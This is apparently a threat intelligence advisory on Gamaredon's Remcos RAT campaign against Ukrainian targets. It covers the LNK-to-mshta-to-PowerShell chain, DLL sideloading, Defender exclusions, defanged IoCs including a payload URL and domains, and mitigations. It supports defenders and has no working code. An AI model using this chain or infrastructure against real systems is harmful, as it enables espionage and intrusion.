Gamaredon Revives Remcos RAT in Fileless LNK Shortcut Attacks

Gamaredon Revives Remcos RAT in Fileless LNK Shortcut Attacks

$Threat Group: Gamaredon (a.k.a. Primitive Bear, UAC‑0010/UAC‑0184, Hive0156)
Threat Type: Remote Access Trojan (RAT)
Exploited Vulnerabilities: LNK shortcut execution, mshta abuse, PowerShell scripting, DLL sideloading
Malware Used: Remcos RAT v6.0.0 Pro
Threat Score: 🔴 High (7.5/10) – Due to fileless in-memory execution, sophisticated evasion, geofencing, and persistence techniques
Last Threat Observation: 31 July 2025


Overview

Beginning in late 2024 and continuing through July 2025, the Russian-aligned cyber espionage group Gamaredon has launched a sustained wave of phishing campaigns leveraging weaponised Windows .LNK shortcut files to deliver the commercial Remcos Remote Access Trojan (RAT). These campaigns have steadily evolved, incorporating new lures themed around Ukrainian military, governmental, and civil correspondence. Delivered via ZIP email attachments, these .LNK files serve as the primary vector to execute fileless payloads using trusted Windows utilities such as mshta.exe, obfuscated PowerShell loaders, and DLL sideloading with legitimate binaries.

Attribution links Gamaredon's activity directly to Russia’s FSB Center 18, with recent activity labelled as Hive0156 reflecting tactical refinements in delivery, stealth, and infrastructure obfuscation. The campaigns make use of geofenced command-and-control infrastructure, enabling Remcos to operate covertly with advanced persistence.


Key Details

Delivery Method: ZIP archive containing .LNK shortcut files

Target: Ukrainian military, government, and administrative entities

Functions:

  • Fileless in-memory execution
  • VBScript via HTA launch
  • PowerShell shellcode reconstruction
  • Registry modification and persistence
  • DLL sideloading using signed binaries

Obfuscation: Use of mshta.exe, encoded PowerShell, in-memory execution, decoy documents, signed binary abuse


Attack Vectors

Gamaredon’s attack chain begins with ZIP attachments containing .LNK files named to resemble sensitive documents (e.g., troop movements, petitions, coordinates). Upon execution, the .LNK file launches mshta.exe, which downloads a remote HTA file. This HTA runs VBScript to:

  1. Execute obfuscated PowerShell (e.g., 24.ps1)
  2. Deploy a decoy PDF or spreadsheet document
  3. Modify registry values for persistence (HKCU\...\RunOnce)
  4. Exclude payload path from Defender scans

The PowerShell payload reconstructs shellcode in memory and injects Remcos into explorer.exe. In some variants, a signed binary like TiVoDiag.exe is used to sideload mindclient.dll, which decrypts and launches the Remcos payload. Remcos then connects to command-and-control servers hosted on providers like GTHost and HyperHosting—restricted to Ukrainian IPs using geo-fencing.


Known Indicators of Compromise (IoCs)

IPv4 Addresses

  • 198[.]23[.]251[.]10
  • 92[.]82[.]184[.]33

MD5 Hashes

  • 560682cdcf395b5eb95487c7ef65c63e
  • ae8066bd5a66ce22f6a91bd935d4eee6

SHA1 Hashes

  • d2f97077fcf7e340a4262fa944ab13f133aa4e58
  • e444d001f2b69259f7845a5ffe9a44113d90e382

SHA256 Hashes

  • 506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6
  • 5ec8268a5995a1fac3530acafe4a10eab73c08b03cabb5d76154a7d693085cc2
  • 8bc668fd08aecd53747de6ea83ccc439bdf21b6d9edf2acafd7df1a45837a4e1

URLs

  • hxxp://shipping-hr[.]ro/m/r/r[.]txt

Domains

  • mal289re1[.]es
  • shipping-hr[.]ro

Mitigation and Prevention

User Awareness: Train users to recognise and report suspicious .LNK files and ZIP attachments. Emphasise vigilance against social engineering techniques and decoy document lures.

Email Filtering: Block .LNK, .HTA, and executable files in email attachments. Use sandboxing to analyse embedded scripts and archive contents.

Antivirus Protection: Ensure AV engines can inspect in-memory PowerShell execution. Block abuse of mshta.exe and monitor use of legitimate binaries for DLL sideloading.

Two-Factor Authentication (2FA): Enforce 2FA to limit the impact of credential theft in case of compromise.

Monitor Logs: Monitor Windows Event Logs for anomalous use of mshta.exe, registry modifications under Run/RunOnce, and unusual parent-child process relationships.

Regular Updates: Ensure OS and endpoint security tools are up to date. Apply application control policies where feasible.


Risk Assessment

Gamaredon’s use of social engineering, trusted system binaries, fileless payloads, and geofenced C2 infrastructure presents a high risk to targeted environments. The sophistication of this campaign and the use of Remcos RAT (capable of keylogging, browser data theft, and remote surveillance) make this threat a priority concern for organisations in or supporting Ukraine.

Threat Score: 🔴 High (7.5/10)


Conclusion

Gamaredon’s Remcos campaigns continue to demonstrate the group’s persistent evolution and operational focus on Ukrainian targets. By leveraging .LNK files for fileless malware delivery, DLL sideloading, and command-and-control techniques tailored for stealth and persistence, Hive0156 poses a serious threat to national infrastructure and government assets.

Organisations must adopt layered defences with strong endpoint detection, email controls, script execution restrictions, and user training. Continuous intelligence monitoring is essential to detect and block the latest variations of this campaign.


Sources:

Cisco Talos – Gamaredon LNK to Remcos campaign – https://blog.talosintelligence.com/gamaredon-campaign-distribute-remcos/
IBM X-Force – Hive0156 targeting Ukraine – https://www.ibm.com/think/x-force/hive0156-continues-remcos-campaigns-against-ukraine
Qualys TRU – PowerShell-based Remcos delivery – https://blog.qualys.com/vulnerabilities-threat-research/2025/05/15/fileless-execution-powershell-based-shellcode-loader-executes-remcos-rat
OTX ALienVault – Indicators of Compromise - https://otx.alienvault.com/pulse/688a324d62b64db244b9463f